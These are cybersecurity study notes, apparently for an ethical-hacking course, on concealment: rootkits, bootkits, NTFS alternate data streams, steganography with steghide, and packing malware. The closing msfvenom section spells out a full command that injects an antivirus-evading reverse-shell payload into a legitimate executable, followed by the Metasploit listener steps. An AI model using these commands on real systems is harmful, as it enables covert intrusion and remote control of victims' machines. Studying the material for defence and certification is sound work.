Skip to main content
Version: 1.0.2

Hiding files

  • Attacker attempts to cover their tracks in order to ensure future access to the system.

Rootkits​

  • πŸ“ Creates backdoor to the system to enable the attacker to access to the system.
  • Hides itself for not being detected, can e.g.
    • remove itself from the process list
    • replace certain system calls and utilities
  • Do not spread by themselves.
    • Usually hidden in other software, waiting to be executed
  • πŸ’‘ Best alternative for recovery is to wipe and reload from a known-good media.
  • See also Rootkit Trojans

Rootkit objectives​

  • Gaining remote backdoor access
  • Hiding traces of the attack
  • Collect confidential data
  • Install other malicious programs on the machine

Rootkit levels​

  • Hypervisor level
    • Acts as a hypervisor and load the target OS as a virtual machine.
  • Hardware/firmware
    • Conceal itself in hardware devices that are not inspected
    • E.g. in a motherboard firmware used to spy against governments
  • Kernel level
    • Replaces portions of OS code or adds new malicious core to it.
    • Hard to detect as they run with OS privileges (ring 0)
    • E.g. Linux Mint website was hacked to distribute ISO files with malicious kernel.
  • Boot loader level
    • Replaces the original bootloader with a malicious one
  • Application level
    • Changes the behavior of the target application
  • Library level
    • Designed to replace the original system calls in order to hide the attacker's activities
  • Privilege rings for the x86 available in protected mode
  • Horse Pill, slides, code
    • Linux rootkit that:
      1. Infects systems via the initial RAM disk (drive)
      2. Deceives system owners using container primitives.
  • GrayFish
    • Rootkit suspectedly used by NSA in USA in attacks against e.g. Iran.
    • Implanting hard drive firmware to gain access by MBR substitution
  • ZeroAccess / Sirefef
    • Kernel-mode rootkit. That
      • Hides the infected driver on the disk
      • Enables read and write access to the encrypted files
    • Downloads other malware on an infected machine from a P2P botnet.
  • Necurs
    • Infector and rootkit with worlds largest P2P botnet
    • Distributes many malware, including Locky ransomware.
    • Taken down by Microsoft and its partners in 2019
  • Grayfish
    • Developed by Equation Group that's considered to be part of the NSA.

Bootkit​

  • Kernel-mode rootkit that runs every time computer runs
  • Can bypass code signing (kernel-level) in Windows by attaching itself to the master boot record (MBR) of a hard drive
    • Then the rootkit is able to modify boot sequences and other options
    • Allows rootkit to be loaded before the Windows kernel is loaded
  • See also boot sector infectors

NTFS file system​

NTFS Data Stream​

  • Two data streams that help NTFS store files.
    1. Stores data about the file (e.g. permissions)
    2. Stores file data

Alternate data stream (ADS)​

  • Stream that's not in the file but attached to file through the Master File Table
    • the Master File Table contains a list of all file data streams and their locations on the disk
  • Contains file metadata such as file attributes, author, access, and word count
  • Enables attackers to inject malicious code into files and execute it
  • Hard to detect because the file size and the contents remain the same.
    • Only way is to check the timestamps to detect tampering.

Hiding files from GUI​

  • Linux and macOS
    • Prepend single dot (. ) in names of files/folders.
  • Windows
    • Uses a file attribute named hidden for that
    • E.g. by using ATTRIB +H command
  • Very easy to identify and display with command line or by changing GUI settings

Steganography​

  • πŸ“ Technique which hides a message within another message.
    • E.g. an image that's still preserved but you embed your data into it.
  • Used for maintaining information confidentiality
    • E.g. lighting a candle to reveal the secret message in the past.
  • Implementations lacking a sharing secret are forms of security through obscurity
  • Often reversible, hidden message is extracted when it arrives to its destination.
    • Or can be used to watermark to copyright of images, videos etc.
  • Used by attackers to e.g. hide keyloggers, or inserting source code for hacking tools.
  • Can be:
    • Technical stenography: uses scientific methods to hide messages
    • Linguistic stenography: uses a carrier to hide messages
  • Can be: β€’ Image β€’ Document β€’ Folder β€’ Video β€’ Audio β€’ Web β€’ Spam/email β€’ DVD-ROM β€’ Natural text β€’ Hidden OS β€’ Source Code

Steganalysis​

  • Discovering of the hidden data in a medium
  • Two phases
    1. Detection: ensuring existence of hidden information
    2. Distortion: trying to extract the hidden message
  • Methods:
    • Stego only attack
      • Only the stego-object is available for analysis.
    • Known stego attack
      • Steganography algorithm is known and both the original and stego-object are available.
    • Known message attack
      • Hidden message and the corresponding stego-image are known.
      • The analysis of patterns that correspond to the hidden information could help decipher such messages in future.
    • Known cover attack
      • The stego-object as well as the original medium is available.
      • The stego-object is compared with the original cover object to detect any hidden information.
    • Chosen message attack
      • The steganalyst generates a stego-object from some stenography tool or algorithm of a chosen message.
      • The goal in this attack is to determine patterns in the stego-object that may point to the use of specific stenography tools or algorithms.
    • Chosen stego attack
      • The stenography algorithm and stego-object are known.

steghide​

  • Tool to embed and extract data from JPEG, BMP, WAV and AU.
  • steghide embed -cf test.jpg -ef hide-me.txt
    • -cf: target file where the data will be hid
    • -ef: file to be embedded
    • Asks you for passphrase to encrypt the data
  • steghide extract -sf test.jpg

Packing Malware​

  • Embedding malware in other files (e.g. PDF, JPEG) to make it hidden
  • Executable files to embed are good as they'll execute your malware when they're executed.
  • You can do it
    • manually (hard to do, hard do detect)
    • or in a standardized way (automated, but detected easily)
  • E.g. many crack files come with embedded malware.

msfvenom​

  • πŸ“ Payload generator and packer in Metasploit framework.
  • Usage e.g. msfvenom -a x86 --platform-windows -x /root/Downloads/someProgram.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.122.110 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o program.exe
    • -x: Executable that'll be patched (injected)
    • -k: Keep functionality in the program
    • -p: Payload to inject
      • In the example it's reverse shell that gives remote access.
      • Server becomes client (creates connection), client becomes server.
      • Victim communicates back to the attacking machine
    • -e x86/shikata_ga_nai: Encoder to avoid antivirus detection
    • -i 3: Encode 3 times for more stealth
    • Once it's executed you can start listening to the infected computer using:
      • msfconsole to start listening to the IP address:
        • use exploit/multi/handler
        • set payload windows/shell/reverse_tcp
        • set LHOST <target-ip-address>
        • set LPORT 4444
        • exploit
  • See also MSFvenom |Β Automated penetration testing tools